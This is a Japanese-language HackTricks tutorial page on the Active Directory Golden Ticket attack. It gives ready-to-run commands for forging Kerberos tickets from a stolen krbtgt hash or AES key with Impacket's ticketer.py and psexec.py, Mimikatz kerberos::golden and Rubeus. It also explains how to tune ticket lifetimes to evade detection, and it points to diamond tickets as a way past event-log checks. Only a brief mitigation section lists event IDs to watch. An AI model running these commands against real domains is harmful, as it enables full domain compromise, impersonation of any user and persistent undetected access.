hacktricks/windows-hardening/active-directory-methodology/golden-ticket.md

7.3 KiB
Raw Blame History

ゴールデンチケット

htARTEHackTricks AWS Red Team Expert でAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法

ゴールデンチケット

ゴールデンチケット攻撃は、Active DirectoryADkrbtgtアカウントのNTLMハッシュを使用して任意のユーザーを偽装する合法的なチケット発行チケットTGTを作成することにあります。この技術は、偽装されたユーザーとしてドメイン内の任意のサービスやマシンにアクセスできるため、特に有利です。krbtgtアカウントの資格情報は自動的に更新されないことを覚えておくことが重要です。

krbtgtアカウントのNTLMハッシュを取得するためには、さまざまな方法があります。これは、ドメイン内の任意のドメインコントローラDCにあるLocal Security Authority Subsystem ServiceLSASSプロセスまたはNT Directory ServicesNTDS.ditファイルから抽出することができます。さらに、DCsync攻撃を実行することで、Mimikatzのlsadump::dcsyncモジュールやImpacketのsecretsdump.pyスクリプトなどのツールを使用してこのNTLMハッシュを取得することができます。これらの操作を行うには、通常ドメイン管理者権限または同等のアクセスレベルが必要です。

NTLMハッシュはこの目的に適した方法ですが、運用上のセキュリティ上の理由から、Advanced Encryption StandardAESKerberosキーAES128およびAES256を使用してチケットを偽造することが強く推奨されています。

python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass

{% endcode %}

{% code title="Windowsから" %}

#mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory

# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi

{% endcode %}

ゴールデンチケットが注入されたら、共有ファイル (C$) にアクセスし、サービスとWMIを実行できるため、psexec または wmiexec を使用してシェルを取得できますwinrmを介してシェルを取得することはできないようです

一般的な検知の回避

ゴールデンチケットを検知する最も一般的な方法は、Kerberosトラフィックを検査することです。デフォルトでは、MimikatzはTGTに 10年間署名を行います。これにより、それを使用して行われた後続のTGSリクエストで異常として目立ちます。

Lifetime : 3/11/2021 12:39:57 PM ; 3/9/2031 12:39:57 PM ; 3/9/2031 12:39:57 PM

/startoffset/endin/renewmax パラメータを使用して、開始オフセット、期間、および最大更新回数を制御します(すべて分単位)。

Get-DomainPolicy | select -expand KerberosPolicy
残念ながら、TGTの寿命は4769の中に記録されていないため、Windowsイベントログでこの情報を見つけることはできません。ただし、**事前の4768がない4769を見る**ことができます。**TGTなしでTGSを要求することはできません**ので、発行されたTGTの記録がない場合、それがオフラインで偽造されたことを推測することができます。

この検出を**バイパスする**ために、ダイヤモンドチケットをチェックしてください:

{% content-ref url="diamond-ticket.md" %}
[diamond-ticket.md](diamond-ticket.md)
{% endcontent-ref %}

### 緩和

* 4624: アカウントログオン
* 4672: 管理者ログオン
* `Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List Property`

防御者ができる他の小技は、デフォルトのドメイン管理者アカウントなど、**機密ユーザーの4769に警告**を出すことです。

## 参考文献
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets] (https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets)

<details>

<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong></strong></a></summary>

HackTricksをサポートする他の方法

* **HackTricksで企業を宣伝**したい場合や、**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **ハッキングトリックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する。

</details>